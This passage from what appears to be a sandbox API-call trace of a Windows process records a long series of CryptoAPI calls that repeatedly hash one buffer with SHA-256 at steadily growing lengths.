(in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338232d0) returned 1 [0190.336] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.336] CryptHashData (hHash=0x3396ef60, pbData=0x32349170, dwDataLen=0x460, dwFlags=0x0) returned 1 [0190.336] CryptDestroyHash (hHash=0x3396ef60) returned 1 [0190.336] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0190.336] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338220d0) returned 1 [0190.336] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.336] CryptHashData (hHash=0x3396eb70, pbData=0x32349170, dwDataLen=0x480, dwFlags=0x0) returned 1 [0190.337] CryptDestroyHash (hHash=0x3396eb70) returned 1 [0190.337] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0190.337] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338237d0) returned 1 [0190.337] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.337] CryptHashData (hHash=0x3396f0b0, pbData=0x32349170, dwDataLen=0x4a0, dwFlags=0x0) returned 1 [0190.337] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0190.337] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0190.337] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338226d0) returned 1 [0190.338] CryptCreateHash (in: hProv=0x338226d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.338] CryptHashData (hHash=0x3396ee10, pbData=0x32349170, dwDataLen=0x4c0, dwFlags=0x0) returned 1 [0190.338] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0190.338] CryptReleaseContext (hProv=0x338226d0, dwFlags=0x0) returned 1 [0190.338] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338221d0) returned 1 [0190.338] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.338] CryptHashData (hHash=0x3396f0b0, pbData=0x32349170, dwDataLen=0x4e0, dwFlags=0x0) returned 1 [0190.338] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0190.338] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0190.338] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338238d0) returned 1 [0190.339] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.339] CryptHashData (hHash=0x3396f580, pbData=0x32349170, dwDataLen=0x500, dwFlags=0x0) returned 1 [0190.339] CryptDestroyHash (hHash=0x3396f580) returned 1 [0190.339] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0190.339] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822ed0) returned 1 [0190.340] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.340] CryptHashData (hHash=0x3396f200, pbData=0x32349170, dwDataLen=0x520, dwFlags=0x0) returned 1 [0190.340] CryptDestroyHash (hHash=0x3396f200) returned 1 [0190.340] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0190.340] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338225d0) returned 1 [0190.340] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.340] CryptHashData (hHash=0x3396f430, pbData=0x32349170, dwDataLen=0x540, dwFlags=0x0) returned 1 [0190.340] CryptDestroyHash (hHash=0x3396f430) returned 1 [0190.340] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0190.340] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338225d0) returned 1 [0190.341] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.341] CryptHashData (hHash=0x3396f820, pbData=0x32349170, dwDataLen=0x560, dwFlags=0x0) returned 1 [0190.341] CryptDestroyHash (hHash=0x3396f820) returned 1 [0190.341] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0190.341] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338222d0) returned 1 [0190.341] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.341] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0x580, dwFlags=0x0) returned 1 [0190.341] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.341] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0190.342] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822dd0) returned 1 [0190.342] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.342] CryptHashData (hHash=0x3396f430, pbData=0x32349170, dwDataLen=0x5a0, dwFlags=0x0) returned 1 [0190.342] CryptDestroyHash (hHash=0x3396f430) returned 1 [0190.342] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0190.342] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338225d0) returned 1 [0190.343] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.343] CryptHashData (hHash=0x3396ef60, pbData=0x32349170, dwDataLen=0x5c0, dwFlags=0x0) returned 1 [0190.343] CryptDestroyHash (hHash=0x3396ef60) returned 1 [0190.343] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0190.343] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338230d0) returned 1 [0190.343] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.345] CryptHashData (hHash=0x3396ea20, pbData=0x32349170, dwDataLen=0x5e0, dwFlags=0x0) returned 1 [0190.345] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0190.345] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0190.345] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33823bd0) returned 1 [0190.346] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.346] CryptHashData (hHash=0x3396f200, pbData=0x32349170, dwDataLen=0x600, dwFlags=0x0) returned 1 [0190.346] CryptDestroyHash (hHash=0x3396f200) returned 1 [0190.346] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0190.346] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338227d0) returned 1 [0190.347] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.347] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0x620, dwFlags=0x0) returned 1 [0190.347] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.347] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0190.347] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338226d0) returned 1 [0190.347] CryptCreateHash (in: hProv=0x338226d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.347] CryptHashData (hHash=0x3396f350, pbData=0x32349170, dwDataLen=0x640, dwFlags=0x0) returned 1 [0190.347] CryptDestroyHash (hHash=0x3396f350) returned 1 [0190.347] CryptReleaseContext (hProv=0x338226d0, dwFlags=0x0) returned 1 [0190.347] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338227d0) returned 1 [0190.348] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.348] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0x660, dwFlags=0x0) returned 1 [0190.348] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.348] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0190.348] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338223d0) returned 1 [0190.348] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.349] CryptHashData (hHash=0x3396ea20, pbData=0x32349170, dwDataLen=0x680, dwFlags=0x0) returned 1 [0190.349] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0190.349] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0190.349] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822ed0) returned 1 [0190.349] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.349] CryptHashData (hHash=0x3396f350, pbData=0x32349170, dwDataLen=0x6a0, dwFlags=0x0) returned 1 [0190.349] CryptDestroyHash (hHash=0x3396f350) returned 1 [0190.349] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0190.349] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338234d0) returned 1 [0190.350] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.350] CryptHashData (hHash=0x3396f120, pbData=0x32349170, dwDataLen=0x6c0, dwFlags=0x0) returned 1 [0190.350] CryptDestroyHash (hHash=0x3396f120) returned 1 [0190.350] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0190.350] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338225d0) returned 1 [0190.350] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.350] CryptHashData (hHash=0x3396eb70, pbData=0x32349170, dwDataLen=0x6e0, dwFlags=0x0) returned 1 [0190.350] CryptDestroyHash (hHash=0x3396eb70) returned 1 [0190.350] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0190.350] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33821dd0) returned 1 [0190.351] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.351] CryptHashData (hHash=0x3396f350, pbData=0x32349170, dwDataLen=0x700, dwFlags=0x0) returned 1 [0190.351] CryptDestroyHash (hHash=0x3396f350) returned 1 [0190.351] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0190.351] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338236d0) returned 1 [0190.352] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.352] CryptHashData (hHash=0x3396f350, pbData=0x32349170, dwDataLen=0x720, dwFlags=0x0) returned 1 [0190.352] CryptDestroyHash (hHash=0x3396f350) returned 1 [0190.352] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0190.352] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822ed0) returned 1 [0190.353] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.353] CryptHashData (hHash=0x3396f350, pbData=0x32349170, dwDataLen=0x740, dwFlags=0x0) returned 1 [0190.353] CryptDestroyHash (hHash=0x3396f350) returned 1 [0190.353] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0190.353] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338231d0) returned 1 [0190.354] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.354] CryptHashData (hHash=0x3396f200, pbData=0x32349170, dwDataLen=0x760, dwFlags=0x0) returned 1 [0190.354] CryptDestroyHash (hHash=0x3396f200) returned 1 [0190.354] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0190.354] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338239d0) returned 1 [0190.354] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.354] CryptHashData (hHash=0x3396f430, pbData=0x32349170, dwDataLen=0x780, dwFlags=0x0) returned 1 [0190.354] CryptDestroyHash (hHash=0x3396f430) returned 1 [0190.354] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0190.354] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338232d0) returned 1 [0190.355] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.355] CryptHashData (hHash=0x3396f120, pbData=0x32349170, dwDataLen=0x7a0, dwFlags=0x0) returned 1 [0190.355] CryptDestroyHash (hHash=0x3396f120) returned 1 [0190.355] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0190.355] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338230d0) returned 1 [0190.356] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.356] CryptHashData (hHash=0x3396ef60, pbData=0x32349170, dwDataLen=0x7c0, dwFlags=0x0) returned 1 [0190.356] CryptDestroyHash (hHash=0x3396ef60) returned 1 [0190.356] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0190.356] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338235d0) returned 1 [0190.356] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.356] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0x7e0, dwFlags=0x0) returned 1 [0190.356] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.356] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0190.356] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338234d0) returned 1 [0190.357] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.357] CryptHashData (hHash=0x3396f0b0, pbData=0x32349170, dwDataLen=0x800, dwFlags=0x0) returned 1 [0190.357] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0190.357] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0190.357] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338231d0) returned 1 [0190.358] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.358] CryptHashData (hHash=0x3396f580, pbData=0x32349170, dwDataLen=0x820, dwFlags=0x0) returned 1 [0190.358] CryptDestroyHash (hHash=0x3396f580) returned 1 [0190.358] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0190.358] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338234d0) returned 1 [0190.358] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.358] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0x840, dwFlags=0x0) returned 1 [0190.358] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.358] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0190.358] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338228d0) returned 1 [0190.359] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.359] CryptHashData (hHash=0x3396f0b0, pbData=0x32349170, dwDataLen=0x860, dwFlags=0x0) returned 1 [0190.359] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0190.359] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0190.359] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338222d0) returned 1 [0190.360] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.360] CryptHashData (hHash=0x3396f120, pbData=0x32349170, dwDataLen=0x880, dwFlags=0x0) returned 1 [0190.360] CryptDestroyHash (hHash=0x3396f120) returned 1 [0190.360] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0190.360] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338228d0) returned 1 [0190.361] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.361] CryptHashData (hHash=0x3396f430, pbData=0x32349170, dwDataLen=0x8a0, dwFlags=0x0) returned 1 [0190.361] CryptDestroyHash (hHash=0x3396f430) returned 1 [0190.361] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0190.361] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338225d0) returned 1 [0190.362] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.362] CryptHashData (hHash=0x3396f820, pbData=0x32349170, dwDataLen=0x8c0, dwFlags=0x0) returned 1 [0190.362] CryptDestroyHash (hHash=0x3396f820) returned 1 [0190.362] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0190.362] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338235d0) returned 1 [0190.362] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.362] CryptHashData (hHash=0x3396f200, pbData=0x32349170, dwDataLen=0x8e0, dwFlags=0x0) returned 1 [0190.362] CryptDestroyHash (hHash=0x3396f200) returned 1 [0190.362] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0190.363] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338229d0) returned 1 [0190.363] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.363] CryptHashData (hHash=0x3396f580, pbData=0x32349170, dwDataLen=0x900, dwFlags=0x0) returned 1 [0190.363] CryptDestroyHash (hHash=0x3396f580) returned 1 [0190.363] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0190.363] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33823bd0) returned 1 [0190.364] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.364] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0x920, dwFlags=0x0) returned 1 [0190.364] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.364] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0190.364] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338222d0) returned 1 [0190.364] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.364] CryptHashData (hHash=0x3396f820, pbData=0x32349170, dwDataLen=0x940, dwFlags=0x0) returned 1 [0190.364] CryptDestroyHash (hHash=0x3396f820) returned 1 [0190.364] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0190.364] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338228d0) returned 1 [0190.365] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.365] CryptHashData (hHash=0x3396eda0, pbData=0x32349170, dwDataLen=0x960, dwFlags=0x0) returned 1 [0190.365] CryptDestroyHash (hHash=0x3396eda0) returned 1 [0190.365] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0190.365] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338225d0) returned 1 [0190.366] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.366] CryptHashData (hHash=0x3396ea20, pbData=0x32349170, dwDataLen=0x980, dwFlags=0x0) returned 1 [0190.366] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0190.366] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0190.366] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338237d0) returned 1 [0190.366] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.366] CryptHashData (hHash=0x3396f820, pbData=0x32349170, dwDataLen=0x9a0, dwFlags=0x0) returned 1 [0190.366] CryptDestroyHash (hHash=0x3396f820) returned 1 [0190.366] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0190.366] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33821fd0) returned 1 [0190.367] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.367] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0x9c0, dwFlags=0x0) returned 1 [0190.367] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.367] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0190.367] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338222d0) returned 1 [0190.367] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.368] CryptHashData (hHash=0x3396f3c0, pbData=0x32349170, dwDataLen=0x9e0, dwFlags=0x0) returned 1 [0190.368] CryptDestroyHash (hHash=0x3396f3c0) returned 1 [0190.368] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0190.368] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338227d0) returned 1 [0190.368] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.368] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0xa00, dwFlags=0x0) returned 1 [0190.368] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.368] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0190.368] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338225d0) returned 1 [0190.369] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.369] CryptHashData (hHash=0x3396ef60, pbData=0x32349170, dwDataLen=0xa20, dwFlags=0x0) returned 1 [0190.369] CryptDestroyHash (hHash=0x3396ef60) returned 1 [0190.369] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) 